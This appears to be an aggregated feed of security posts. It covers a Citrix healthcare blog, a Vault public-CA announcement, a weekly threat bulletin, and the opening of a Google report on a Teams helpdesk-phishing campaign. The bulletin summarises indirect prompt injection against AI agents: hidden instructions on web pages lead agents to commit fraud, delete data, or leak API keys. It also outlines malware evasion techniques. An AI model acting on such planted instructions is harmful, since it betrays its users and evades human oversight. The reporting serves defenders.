Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my company's views.
Disclaimer: some of the links on this site are affiliate links, if you click on them and make a purchase, I make a commission.
Six months into my role at Citrix, I’ve found myself thinking a lot about where I came from. Not in a nostalgic way, but in a very real, almost day-to-day sense. I spent years as a CIO walking the hospital floor, sitting in rooms where decisions weren’t theoretical. They were decisions that had immediate impact on clinicians, patients, and the people trying to hold everything together behind the scenes. What I didn’t fully expect is how much this role would bring me back into that same energy. Being on-site again, across different health systems, listening more than talking… it’s been grounding. And honestly, it’s been eye-opening in a different way.
What I’m hearing is consistent. Almost to the point where you can finish the sentence of a CIO before they say it.
Health systems are under pressure in ways that feel heavier than even a few years ago. Cost comes up in every conversation, but not in a simple “we need to cut” way. Leaders are trying to make sense of what they already have – what’s redundant, underutilized, or still providing value. There’s a real desire to be smarter about the existing footprint, not just layer on something new. There’s also pressure to do more with less even when the AI train continues to barrel into the doors of hospitals at a faster rate than any other technology I’ve seen.
Security is an assumed topic – every conversation eventually lands there. Not just perimeter security, but what’s happening inside the environment – lateral movement, shadow IT, medical devices that were never really designed to be secured in the first place. There’s an understanding now that it’s not a matter of if something happens, but when, and how prepared you are when it does.
Resiliency comes up right alongside that. And not just uptime in the traditional sense. I’m hearing more about operational continuity and what happens to care delivery when systems are unavailable, even for a short period of time. The tolerance for disruption is basically gone.
Then there’s M&A. It’s moving fast – sometimes faster than the organizations themselves would prefer. Integration strategies are being built while planes are still in the air. IT teams are expected to connect environments quickly, securely, and without adding cost (which is easier said than done).
Layer in governance challenges and increasing regulatory expectations, and you start to see the weight of it all. But the conversations always come back to people. Clinician burnout is still very real. And hovering over all of this is the “Silver Tsunami.” Experienced staff – people who know how these environments actually work – are retiring, and there’s real concern about the knowledge that gets lost when they leave.
What’s interesting is that despite all of this, I don’t hear people asking for more vendors. In fact, it’s usually the opposite. What they’re asking for, in a much more direct way than I remember, is partnership. Not on a slide, not in a contract – in how the work actually gets done.
Coming into this role, I had my own perspective on what that meant from the outside. Six months in, I’ve had the chance to see how teams at Citrix actually show up. And I’ll say this: it’s less about having the perfect answer and more about being willing to sit in the problem with the customer and work through it.
For example, the discussion isn’t just about protecting the edge anymore. It’s about how you reduce risk inside the environment and how you segment that environment in a way that actually reflects how healthcare operates. I’ve watched teams map out approaches that address both macro and micro segmentation, tying together infrastructure and application layers in a way that helps limit lateral movement and better protect things like medical devices and research environments. It’s not theoretical. It’s grounded in what customers are actually dealing with and opening doors to what’s possible – all while reducing the need for sneakernet.
I’ve also been part of situations where things had already gone wrong, such as organizations recovering from cyber events and trying to get systems back online while managing the clinical impact in real time. In one case, we helped bring an environment back in about two days. That matters. But what stayed with me more was how much faster that recovery could have been if we had been involved earlier. That’s something I’ve been thinking about a lot—how different the outcome can be when you’re part of the conversation before the crisis. What I’ve learned is that Citrix is a great partner when the team is in the room as decisions are getting made. There’s a lot to consider when it comes to shifting disaster recovery to business resiliency, and modern IT strategy is everything.
It’s no surprise that cost continues to be a thread throughout all the conversations I’m having. But again, it’s not just about reduction. It’s about clarity and allocation. I’ve seen how tools like Citrix uberAgent can help organizations get a better understanding of how applications and user personas are actually being used ahead of major changes or decisions. That data-driven visibility can lead to more thoughtful conversations and decisions around application rationalization, which is a massive spend category in IT budgets. Overall, financial flexibility is going to be a key component of how IT budgets adapt in the years to come. Cloud migration caused a lot of disruption in the name of flexibility in the past.
As we go forward, financial agility will need to also provide financial stability, and how that happens across your workforce and the people engaging with your technology every day will become more closely aligned. Citrix recognizes the need to enhance user and financial agility without adding unnecessary complexity and will soon provide a new way to address ongoing challenges. Register here to learn more.
Some of the most practical ways that Citrix adds value that I’ve seen are the smaller ones. The things that don’t always make headlines but make a real difference day-to-day. Using session recording and monitoring capabilities to troubleshoot issues in real time, reducing the back-and-forth between support teams and clinicians. It’s simple, but when teams are stretched thin, those gains matter.
If I step back and think about what’s changed for me personally over these last six months, it’s probably that my definition of partnership has gotten more specific. It’s less about what we say and more about when and how we show up. Are we there early enough to help shape the path, or are we being brought in after decisions have already been made? Are we simplifying things, or adding another layer of complexity?
No CIO should be navigating the current healthcare IT landscape without bringing along a few trusted advisors. That said, I don’t think any of us have this completely figured out. The environment is too dynamic for that. But I do believe there’s an opportunity for me to do things differently than what’s been done before for our healthcare customers. And that is to be more connected to what customers are actually experiencing and to respond in a way that reflects that.
Walking the floors again, even in a different role, has reminded me of something I probably already knew but needed to see again. Healthcare doesn’t need more noise. It needs people who understand what’s at stake and are willing to do the work alongside the teams carrying that responsibility every day.
Six months in, I’m still learning. But I’m encouraged by what I’ve seen so far—and even more by what I think is possible if we keep leaning in the right way.
from Citrix Blogs https://ift.tt/QcUPBn1
In modern enterprises, security is only as strong as its weakest link. For most organizations, that link is often the manual, fragmented process of managing X.509 certificates. While HashiCorp Vault (now IBM Vault) has long been the gold standard for automating internal PKI (public key infrastructure), a significant hurdle remained: the "public trust" boundary.
Today, we are excited to announce a major expansion of Vault Enterprise’s PKI capabilities. You can now integrate and orchestrate public certificate authorities (CAs) directly within Vault, providing a single, automated workflow for every certificate your organization needs — whether it’s for an internal microservice or a customer-facing website.
The pain of fragmented certificate management
Many organizations have successfully automated their internal workflows using Vault’s private PKI. However, when a service requires a certificate trusted by external browsers or public networks, the automation stops. This creates a "dual-track" management problem that introduces several critical pain points:
• Operational overhead: Without native public CA integration, teams must step outside their automated pipelines to manually request, renew, and revoke certificates via external CA portals. This human intervention is the primary cause of errors and missed renewals.
• The "outage clock": Every manual certificate is a ticking clock. Fragmented management means you lack a central view of expiration dates across different providers, leading to unexpected downtime when a public-facing API or website certificate expires.
• Siloed governance: Organizations are forced to split governance between one tool for private certs and another for public certs. This inconsistency makes it nearly impossible to enforce unified security policies or maintain a complete audit trail for compliance standards like NIST, PCI DSS, or SOC2.
• Limited external utility: Private CAs are excellent for internal trust, but they don't work for customer-facing services. Relying on separate tools for public trust limits Vault’s utility in hybrid and multi-cloud scenarios where external trust is a hard requirement.
A single pane of glass for PKI
Enterprises are looking for a way to centralize the entire certificate lifecycle. Our new public CA integration does exactly that. By acting as a central proxy, Vault now securely manages upstream CA credentials and orchestrates the complex validation challenges required for public issuance.
This feature allows your development teams to request publicly trusted certificates using the same Vault APIs and workflows they already use for private ones. The result? A centralized, automated approach that removes manual silos and provides a unified "single pane of glass" view of your organization's entire certificate footprint.
How it works: Orchestrating public trust
This new integration leverages the ACME (Automated Certificate Management Environment) protocol to provide a vendor-agnostic interface for public CA orchestration.
Native integration with leading CAs
Vault now supports native integration with the most prominent public certificate authorities, allowing you to centralize credentials and automate workflows for:
● Let’s Encrypt
● DigiCert
● GlobalSign (beta)
● Sectigo (beta)
Orchestration via Vault agent
The Vault agent has been updated to act as the primary orchestrator. It manages communication between Vault and the public CA, handling the heavy lifting of domain validation.
In this initial release, we are implementing support for the HTTP-01 challenge. This means Vault can automate the process of proving domain ownership by serving a specific token over HTTP. For teams managing diverse infrastructures, we are also working to add DNS-01 challenge support in the very near future to handle wildcard certificates and non-web-accessible environments.
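The HTTP-01 exchange described above, as an added example that is not Vault's or HashiCorp's code: under RFC 8555 the value served at `/.well-known/acme-challenge/<token>` is the token joined to the RFC 7638 thumbprint of the ACME account key, and the CA compares the fetched body against that string. The account JWK, the token and the function names are constructed for this sketch.

```python
import base64
import hashlib
import json
import string

# RFC 7638: only these members, sorted by name, feed the thumbprint.
REQUIRED_MEMBERS = {
    "RSA": ("e", "kty", "n"),
    "EC": ("crv", "kty", "x", "y"),
    "OKP": ("crv", "kty", "x"),
}
TOKEN_ALPHABET = set(string.ascii_letters + string.digits + "-_")
WELL_KNOWN_PREFIX = "/.well-known/acme-challenge/"


def b64url(data: bytes) -> str:
    """Unpadded base64url, the encoding ACME uses throughout."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def jwk_thumbprint(jwk: dict) -> str:
    """SHA-256 thumbprint of the account public key (RFC 7638)."""
    kty = jwk.get("kty")
    if kty not in REQUIRED_MEMBERS:
        raise ValueError(f"unsupported key type: {kty!r}")
    missing = [m for m in REQUIRED_MEMBERS[kty] if m not in jwk]
    if missing:
        raise ValueError(f"JWK is missing members: {missing}")
    # Extra members (kid, use, alg, ...) are deliberately left out.
    canonical = {m: jwk[m] for m in REQUIRED_MEMBERS[kty]}
    encoded = json.dumps(canonical, sort_keys=True, separators=(",", ":"))
    return b64url(hashlib.sha256(encoded.encode("utf-8")).digest())


def key_authorization(token: str, account_jwk: dict) -> str:
    """The exact string that must be served for an HTTP-01 challenge."""
    # Tokens are base64url only; rejecting anything else also keeps a
    # file-backed responder from being steered to other paths.
    if not token or not set(token) <= TOKEN_ALPHABET:
        raise ValueError("token must use the base64url alphabet only")
    return f"{token}.{jwk_thumbprint(account_jwk)}"


def serve_challenge(request_path: str, pending: dict) -> tuple:
    """Minimal responder logic: answer only for tokens we are expecting."""
    if not request_path.startswith(WELL_KNOWN_PREFIX):
        return 404, b""
    token = request_path[len(WELL_KNOWN_PREFIX):]
    body = pending.get(token)
    if body is None:
        return 404, b""
    return 200, body.encode("ascii")


def response_is_valid(body: bytes, token: str, account_jwk: dict) -> bool:
    """What the CA checks after fetching the URL over plain HTTP."""
    expected = key_authorization(token, account_jwk).encode("ascii")
    # RFC 8555 section 8.3: trailing whitespace in the body is ignored.
    return body.rstrip() == expected


# Constructed sample values (not a real account key or CA-issued token).
SAMPLE_ACCOUNT_JWK = {
    "kty": "EC",
    "crv": "P-256",
    "x": b64url(bytes(range(32))),
    "y": b64url(bytes(range(32, 64))),
}
SAMPLE_TOKEN = b64url(hashlib.sha256(b"constructed sample token").digest())

if __name__ == "__main__":
    pending = {SAMPLE_TOKEN: key_authorization(SAMPLE_TOKEN, SAMPLE_ACCOUNT_JWK)}
    status, body = serve_challenge(WELL_KNOWN_PREFIX + SAMPLE_TOKEN, pending)
    print(status, body.decode())
    print("CA accepts:", response_is_valid(body, SAMPLE_TOKEN, SAMPLE_ACCOUNT_JWK))
```

Because the key authorization binds the token to the account key, a host that merely echoes tokens back cannot satisfy the challenge for someone else's ACME account.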
Streamlined workflows
The integration supports both secure CSR-based workflows (where the private key never leaves your infrastructure) and flexible identifier-based workflows for rapid issuance.
What you can do today
With this new feature, your security and platform teams can perform the following tasks directly within the Vault ecosystem:
● Set up integrations: Easily configure secure connections with your desired public CA using native Vault configuration.
● Request and download: Dev teams can request public certificates via the Vault API, CLI, or UI and download them immediately upon issuance.
● Manual renewal: Maintain control by manually triggering renewals for public certificates through the Vault interface.
● Revocation: Instantly revoke public certificates created via Vault if a compromise is suspected, ensuring your external security posture is always up to date.
● Leverage the Terraform Vault provider: Fully automate the setup and management of these public CA integrations using the updated Terraform Vault provider.
Conclusion: Taking control of the lifecycle
The goal of Vault Enterprise has always been to simplify the complex. By bringing public CA management into the Vault ecosystem, we are eliminating the manual friction that has long plagued security teams. You no longer have to choose between automation and public trust. With Vault, you can have both.
Whether you are a technical decision-maker looking to reduce the risk of outages or a practitioner aiming to automate manual portal logins, this new integration provides the tools you need for a truly modern, end-to-end PKI strategy.
You scroll past one incident and see another that feels familiar, like it should have been fixed years ago, but it still works with small changes. Same bugs. Same mistakes.
The supply chain is messy. Packages you did not check are stealing data, adding backdoors, and spreading. Attacking the systems behind apps is easier than breaking the apps themselves. The exploits are simple but still work, giving attackers easy access.
AI tools are also part of the problem now. They trust bad input and take real actions, which makes the damage bigger. Then there are quieter issues. Apps take data they should not. Devices behave in strange ways. Attackers keep testing what they can get away with. No noise. Just ongoing damage.
Here is the list for this week’s ThreatsDay Bulletin.
Inter-blockchain communication protocol LayerZero has revealed that North Korean threat actors tracked as TraderTraitor may have been behind the recent hack of decentralized finance (DeFi) project KelpDAO, resulting in the theft of $290 million. "The attack was specifically engineered to manipulate or poison downstream RPC infrastructure by compromising a quorum of the RPCs the LayerZero Labs DVN relied upon to verify transactions," LayerZero said. KelpDAO, in a post on X, said, "Two RPC nodes hosted by LayerZero were compromised. A simultaneous DDoS attack was launched against the third RPC node. This was an attack on LayerZero's infrastructure. Kelp's own systems were not involved in building or operating that infrastructure." Meanwhile, the Arbitrum Security Council has temporarily frozen the 30,766 ETH being held in the address on Arbitrum One that is connected to the KelpDAO exploit. It's worth noting that TraderTraitor was attributed to the mega Bybit hack in early 2025 that led to the theft of $1.5 billion in digital assets. Recently, Lazarus Group was also linked to the $285 million theft from the Drift Protocol.
Separately, VulnCheck has warned of attacks attempting to exploit two flaws in MajorDoMo, a smart home automation platform. While CVE-2026-27175 is a critical command injection vulnerability that started seeing exploitation on April 13, CVE-2026-27174 allows unauthenticated remote code execution via the PHP console in the admin panel and was first detected on April 18. "CVE-2026-27175 was exploited to drop a PHP webshell that delivers persistent backdoor access," VulnCheck said. "CVE-2026-27174 saw exploitation that ended in a Metasploit php/meterpreter/reverse_tcp staged payload." Other vulnerabilities that have witnessed exploitation efforts include CVE-2025-22952, an SSRF in Elestio Memos, and CVE-2024-57046, an authentication bypass in NETGEAR DGN2200 routers.
A number of malicious packages have been discovered in the npm registry: ixpresso-core, forge-jsx, @genoma-ui/components, @needl-ai/common, rrweb-v1, cjs-biginteger, sjs-biginteger, bjs-biginteger, @fairwords/websocket, @fairwords/loopback-connector-es, @fairwords/encryption, js-logger-pack, and @kindo/selfbot. These packages come with features to steal sensitive data from compromised hosts, perform system reconnaissance, implant an SSH backdoor by injecting the attacker's public key into ~/.ssh/authorized_keys, deliver an information stealer, and spread the XWorm remote access trojan (RAT). The packages published under the "@fairwords" scope have also been found to self-propagate to all npm packages using the victim's token and attempt cross-ecosystem propagation to PyPI via .pth file injection. New versions of js-logger-pack have since been found to leverage the Hugging Face repository to poll for updates and use it as a data-theft destination. Also detected was the compromise of @velora-dex/sdk (version 9.4.1) to decode and execute a Base64 payload that fetches a shell script from a remote server that, in turn, downloads and persists a Go-based remote access trojan called minirat on macOS systems. Another legitimate package to be compromised was mgc (versions 1.2.1 through 1.2.4), which was injected with a dropper that detects the operating system and fetches a platform-specific RAT from a GitHub Gist to exfiltrate valuable data.
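A defender-side check for the .pth injection mentioned above, as an added example that is not from the bulletin or the research it cites: Python's `site` module executes any line in a site-packages `.pth` file that starts with `import`, so the scanner below lists every such line for review. The indicator list, function names and sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Heuristic indicators (an assumption of this example, not a complete list).
INDICATORS = re.compile(
    r"\b(exec|eval|compile|base64|urllib|socket|subprocess|os\.system)\b"
)


def executable_lines(pth_text):
    """Yield (line_number, line) for lines that site.py would exec()."""
    for number, line in enumerate(pth_text.splitlines(), 1):
        # site.py only executes lines that start, in column one, with
        # "import" followed by a space or tab; all else is a path or comment.
        if line.startswith(("import ", "import\t")):
            yield number, line.rstrip()


def scan_site_dirs(directories):
    """Return one finding per executable .pth line in the given directories."""
    findings = []
    for directory in directories:
        try:
            names = sorted(os.listdir(directory))
        except OSError:
            continue  # missing or unreadable directory: nothing to report
        for name in names:
            # .pth files are only honoured at the top level of a site dir.
            if not name.endswith(".pth"):
                continue
            path = os.path.join(directory, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    text = handle.read()
            except OSError:
                continue
            for number, line in executable_lines(text):
                hits = sorted(set(INDICATORS.findall(line)))
                findings.append({
                    "file": path,
                    "line": number,
                    "code": line,
                    "indicators": hits,
                    # Legitimate tools (editable installs, for instance) also
                    # use import lines, so unmatched lines are "review".
                    "severity": "high" if hits else "review",
                })
    return findings


def write_constructed_samples(root):
    """Create constructed .pth files; the 'loader' payload is print(1)."""
    samples = {
        "paths.pth": "# plain path entries are not executed\n./vendored\n",
        "editable_demo.pth": "import demo_finder; demo_finder.install()\n",
        "zz_loader.pth": "import base64;exec(base64.b64decode('cHJpbnQoMSk='))\n",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as handle:
            handle.write(content)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        write_constructed_samples(root)
        for finding in scan_site_dirs([root]):
            print(finding["severity"], os.path.basename(finding["file"]),
                  finding["line"], finding["indicators"])
```

On a real host, pass the directories returned by `site.getsitepackages()` and `site.getusersitepackages()` and compare the findings with the files your installed packages are known to ship.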
Forcepoint has detected 10 new indirect prompt injection (IPI) payloads targeting artificial intelligence (AI) agents with malicious instructions designed to achieve financial fraud, data destruction, API key theft, and AI denial-of-service attacks. "Regardless of the specific payload technique or attacker intent, every case follows the same fundamental sequence: the attacker poisons web content, hides the payload from human view, waits for an AI agent to ingest the page, exploits the LLM's inability to distinguish trusted instructions from attacker-controlled content, and triggers a real-world action with a covert exfiltration return channel back to the attacker," the company said.
The Claude desktop app has been found granting itself permission to access web browser data, even if some browsers haven't even been installed on a user's computer, web privacy expert Alexander Hanff said. The app has been spotted placing configuration files in preset locations for Chromium-based browsers like Brave, Google Chrome, Microsoft Edge, and Vivaldi. The Native Messaging manifest files pre-authorize Claude to interact with the browser even before the user installs it. The issue has been described as a case of dark pattern that violates privacy laws in the E.U.
The U.K. National Cyber Security Centre (NCSC) has unveiled a new technology called SilentGlass that's designed to protect video connections from cyber attacks. "SilentGlass, a plug-and-play device, actively blocks anything unexpected or malicious between HDMI and Display Port connections and screens," NCSC said. "Already successfully deployed on Government estates, SilentGlass is now available for anyone to buy and use. It has been approved for use in the most high-threat environments."
In a related development, the NCSC also endorsed passkeys as the default authentication standard and the "first choice of login" for access to all digital services. "Passkeys are a newer method for logging into online accounts, which do much of the heavy lifting for users, only requiring user approval rather than needing to input a password," NCSC said. "This makes passkeys quicker and easier to use and harder for cyber attackers to compromise." It also said the majority of cyber harms to individuals begin with criminals stealing or compromising login details, which makes passkey adoption a "huge leap" in boosting resilience to phishing attacks. More than 50% of active Google services users in the U.K. are said to be already using passkeys.
Reports from Iranian media have claimed that hardware made by Cisco, Juniper, Fortinet, and MikroTik either rebooted or disconnected during recent attacks on Iran, despite the country being cut off from the global internet. "The most striking and suspicious aspect of this incident is its precise timing and the lack of access to the international internet at that moment," Iranian news website Entekhab said. "This disruption occurred at a time when international gateways were effectively blocked or inaccessible; therefore, attributing this chain collapse to 'a simple cyber attack from beyond the borders' is not only unconvincing but also reveals the traces of deep-seated sabotage embedded within the equipment." The report hypothesizes the presence of hidden firmware backdoors or rogue implants within compromised devices, creating a dormant botnet that's activated when a certain event occurs without the need for internet access. The other possibility is a supply chain compromise. "If the chips or installation files of Cisco and Juniper products are compromised before entering the country, even replacing the operating system will not solve the problem, because the root of the problem is embedded in the hardware and read-only memory (ROM)," the report said. These arguments have found purchase in China, whose state media agency Xinhua called U.S.-made equipment the "real trojan horse." The disclosure comes as DomainTools revealed that the various hacktivist personas adopted by Iran, such as Homeland Justice, Karma, and Handala, "constitute a coordinated, MOIS-aligned cyber influence ecosystem operating under multiple branded identities that serve distinct but complementary operational roles."
The Krybit ransomware group has hacked the website of rival ransom group 0APT after the latter threatened to dox Krybit's members. According to security firm Barricade, 0APT leaked the complete database of the Krybit ransomware operation, including victim records, plaintext credentials, Bitcoin wallets, encryption tokens, and a 56MB exfiltration file inventory. In return, Krybit has hit back by compromising 0APT's server within 48 hours, defacing their data leak site, and publishing source code, bash history, Nginx logs, and system files. To rub salt into the wound, the group listed 0APT as victim #1 on their own leak site.
There is a new cryptor-as-a-service platform called FUD Crypt (fudcrypt[.]net). "For $800 to $2,000 per month, subscribers upload an arbitrary Windows executable and receive a multi-stage deployment package that attempts automatic DLL sideloading, in-memory AMSI and ETW interference, silent UAC elevation via CMSTPLUA, and Windows Defender tamper via Group Policy on Enterprise builds," Ctrl-Alt-Intel said.
Two different phishing campaigns targeting Greek, Spanish, Slovenian, Bosnian, Latin, and Central American companies are using different techniques to deliver Formbook malware. "FormBook is a data-stealing malware that targets Windows systems, primarily distributed through phishing emails with malicious attachments," WatchGuard said. "It collects sensitive information like login credentials, browser data, and screenshots, using advanced evasion techniques to avoid detection."
A highly sophisticated, multi-stage post-exploitation framework has been observed targeting organizations in the Middle East and EMEA financial sectors. "The threat actor leverages a legitimate, digitally signed Intel utility (IAStorHelp.exe) by abusing the .NET AppDomainManager mechanism, effectively turning a trusted binary into a stealthy execution container," CYFIRMA said. "This approach allows malicious code to be executed within a trusted environment. It bypasses conventional security controls without modifying the original signed binary." Because AppDomainManager hijacking enables stealth execution within a trusted signed binary, it allows malicious code to run without modifying the original executable, effectively bypassing code-signing trust controls. The attack begins with a phishing email containing a ZIP archive, which contains an LNK file masquerading as a PDF document to execute "IAStorHelp.exe." It's currently not known who is behind the campaign, but the level of sophistication, modular design, and operational discipline suggest capabilities consistent with advanced threat actors.
A new malware campaign is spreading both a remote access trojan and adware together, allowing attackers to establish persistent access and make financial profits. The attack has been found to leverage a loader to deliver the Gh0st RAT trojan and CloverPlus adware, an unwanted software designed to install advertising components and change browser behavior, such as startup pages and pop-up ads, per Splunk.
In a new analysis, Cisco Talos revealed that bad actors can bypass security controls in Apple macOS by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis. "Because Finder is scriptable over RAE, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required," Talos said. "The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents." In addition, attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP operating entirely outside the visibility of standard SSH-based telemetry. In some cases, adversaries can also bypass built-in restrictions by using Terminal as a proxy for execution, encoding payloads in Base64 and deploying them in stages.
A group of academics has released a hackable, modular, and configurable open-source framework called Terrarium for studying and evaluating decentralized LLM-based multi-agent systems (MAS). "As the capabilities of agents progress (e.g., tool calling) and their state space expands (e.g., the internet), multi-agent systems will naturally arise in unique and unexpected scenarios," the researchers said, adding it acts as "an isolated playground for studying agent behavior, vulnerabilities, and safety. It enables full customization of the communication protocol, communication proxy, environment, tool usage, and agents."
According to Reuters, AI company Clarifai said it has deleted 3 million profile photos taken from dating site OkCupid in 2014. It follows a settlement reached last month between the U.S. Federal Trade Commission (FTC) and Match Group, OkCupid's owner. Clarifai is said to have certified the data deletion to the FTC on April 7, 2026, and deleted any models that trained on the data. The company also emphasized that it hadn't shared the data with third parties. The FTC opened the investigation in 2019, after The New York Times reported that Clarifai had built a training database using OkCupid dating profile photos. The behavior was a direct violation of OkCupid's privacy policy, although Clarifai was not accused of wrongdoing.
VulnCheck said it's seeing active exploitation of the Apache ActiveMQ Jolokia remote code execution chain that strings together CVE-2026-34197 and CVE-2024-32114. "CVE-2024-32114 removes authentication from the Jolokia endpoint entirely on ActiveMQ versions 6.0.0 through 6.1.1," VulnCheck's Jacob Baines said. "Combined with CVE-2026-34197, that is zero-credential RCE."
There has been a surge in phishing emails utilizing empty subject lines as a way to lure users to actually click and open the email without the usual warning cues. Known as silent subject or null subject phishing, the technique is designed to exploit blind spots in email defenses, as it allows such emails to bypass security filters that rely on analyzing the subject lines for specific keywords that may indicate potential phishing or scam. "Emails with empty subject lines evade user suspicion by exploiting human curiosity," CyberProof said. "The primary objective of a silent subject campaign is to gain initial access through social engineering, leading to credential compromise, unauthorized access, and potential lateral movement within targeted environments, especially focusing on high-value or VIP users."
A Belarus-based turnkey solution is assisting SIM farm operators in supporting cybercrime on an industrial scale. Infrawatch said that it identified 87 instances of ProxySmart control panels in 17 countries that are linked to at least 24 commercial proxy providers and 35 cellular providers. The footprint spans 94 phone farm locations, distributed across 19 U.S. states, as well as countries in Europe and South America. ProxySmart provides an end-to-end platform for operating and monetizing mobile proxy infrastructure, including farm management, device control, customer provisioning, retail proxy sales, and payment handling. It's accessible via a web-based control panel that's self-hosted by the farm operator. Devices in the farms are either physical Android phones or USB 4G/5G modems. The phones are enrolled via an unsigned Android APK package downloaded from the ProxySmart website, with SMS send and receive capability included. Modems are managed through ModemManager, an open-source USB dongle management tool. The ProxySmart service is written in Python and obfuscated using PyArmor. "ProxySmart is publicly associated with a Belarus-based vendor footprint and offers an end-to-end stack for operating and monetizing a physical farm, including device management, automated IP rotation, customer provisioning, plan enforcement, and anti-bot countermeasures," the company said. "Technical analysis indicates operator capabilities consistent with large-scale evasion enablement, including automated IP rotation, remote device control, and network fingerprint spoofing." SIM farms enable a range of cybercrime activity such as smishing, premium-rate number fraud, bot sign-ups, and one-time password interception.
In response to the findings, ProxySmart disputed its characterization as a SIM farm, stating it's a "data-path proxy management platform" and that its mobile proxy infrastructure "underpins a wide range of legitimate commercial and research activity" including advertising verification, brand protection, price monitoring, and anti-fraud model training, among others.
Ofcom, the U.K.'s independent communications regulator, has launched an investigation into Telegram under the country's Online Safety Act to examine whether the platform is being used to share child sexual abuse material (CSAM) and is doing enough to combat the threat. "We received evidence from the Canadian Centre for Child Protection regarding the alleged presence and sharing of child sexual abuse material on Telegram, and carried out our own assessment of the platform," Ofcom said. "In light of this, we have decided to open an investigation to examine whether Telegram has failed, or is failing, to comply with its duties in relation to illegal content." In a statement shared with The Record, Telegram said it "categorically denies Ofcom's accusations," adding it has "virtually eliminated the public spread of CSAM on its platform through world-class detection algorithms and cooperation with NGOs." Earlier this year, Ofcom also commenced a probe into X to determine whether the service is taking necessary steps to take down illegal content, including non-consensual intimate images and CSAM.
The European Union imposed sanctions on two pro-Russian organizations accused of spreading disinformation and supporting the Kremlin's hybrid influence operations against Europe and Ukraine. The measures target Euromore and the Foundation for the Support and Protection of the Rights of Compatriots Living Abroad (Pravfond). The move is part of the E.U.'s broader effort to counter Russian information and influence operations targeting Europe since the start of Moscow's full-scale invasion of Ukraine in 2022. The E.U. has imposed sanctions on 69 individuals and 19 entities linked to Russian hybrid warfare.
Ukrainian authorities have dismantled a bot farm that's alleged to have supplied thousands of fake social media accounts to Russian intelligence services for use in disinformation campaigns against Ukraine. The suspected organizer of the network has been detained in the northern city of Zhytomyr, and nearly 20,000 fraudulent online profiles that were used in information operations have been blocked. The suspect is believed to have sold more than 3,000 fake Telegram accounts each month to Russian clients. The accounts were created using Ukrainian mobile phone numbers and then advertised on online platforms used by pro-Russian actors. If convicted, the suspect faces up to six years in prison.
More than 130,000 users have downloaded and installed malicious Chrome and Edge extensions that, while offering the promised functionality, also implement covert tracking, remote configuration capabilities, and data collection mechanisms. The 12 extensions posed as tools to download TikTok videos and were available through the official Chrome and Edge stores. The activity has been codenamed StealTok. The extensions have been found to use remote configuration to bypass store review. "Beyond privacy concerns, the use of remote configuration endpoints introduces a significant security risk, enabling post-installation behavior changes that bypass marketplace review mechanisms," LayerX said.
In a new campaign spotted by Sucuri, threat actors are planting a new PHP-based backdoor on Joomla sites to inject SEO spam. The injected script acts as a remote loader to send information about the infected website and awaits further instructions from an attacker-controlled server. "Attackers inject malicious code that silently serves spam content to visitors and search engines, all without the site owner knowing," Sucuri said. "The goal is simple: abuse the site's reputation to push traffic towards products the attacker wants to promote."
A new service called Leak Bazaar has been promoted on the Russian-speaking TierOne forum that claims to process data stolen from extortion and ransomware attacks and turn it into "something more legible, more selective and precise, and making it marketable for the general population to ingest." It's advertised by a user named Snow, who joined the forum on March 3, 2026. "What Leak Bazaar is really offering is not a DLS or Data or Dedicated Leak Site in the conventional sense, but a post-exfiltration service layer," Flare said. "It is trying to reassure both suppliers and buyers that the platform can solve the most frustrating part of data theft, which is that a large percentage of exfiltrated material is too noisy, too unstructured, or too cumbersome to use without additional labor."
GreyNoise has disclosed that a small cluster of 21 IP addresses is now responsible for generating nearly half of all the RDP scanning traffic on the public internet. The addresses are registered to ColocaTel (AS213438), a company based in the Seychelles. According to the threat intelligence firm, mass internet scanning activity is now preceding vendor vulnerability disclosures more frequently than before, with 49% of surges arriving within 10 days of disclosure and 78% within 21 days. In a related development, security researcher Morgan Robertson revealed that almost three-quarters of Perforce P4 source code management servers connected to the internet are misconfigured and leaking source code and sensitive files. "The default Perforce settings allow unauthenticated users to create accounts, list existing users, access passwordless accounts, and, until version 2025.1, allowed syncing repositories remotely; potentially exposing intellectual property across more than a dozen sectors, including gaming, healthcare, automotive, finance, and government," Robertson said. "Action is recommended for all Perforce administrators to ensure security hardening, including setting stronger authentication requirements, disabling automatic account creation, and raising security levels."
None of this is new. That is the problem. Old paths still open, basic checks still skipped, and trust still given where it should not be. Attackers are not doing anything magical, they are just faster and less careful because they do not need to be.
The fixes are known but ignored. Patch early, check what you install, limit access, and stop trusting inputs by default. Most of the damage comes from things that were easy to prevent. Same story next week.
from The Hacker News https://ift.tt/tfSur7W
via IFTTT
Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair
Introduction
Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration.
As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers.
Threat Details
In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.
Infection Chain
The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotKey binary and an AutoHotkey script, sharing the same name, from a threat actor-controlled AWS S3 bucket.
"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
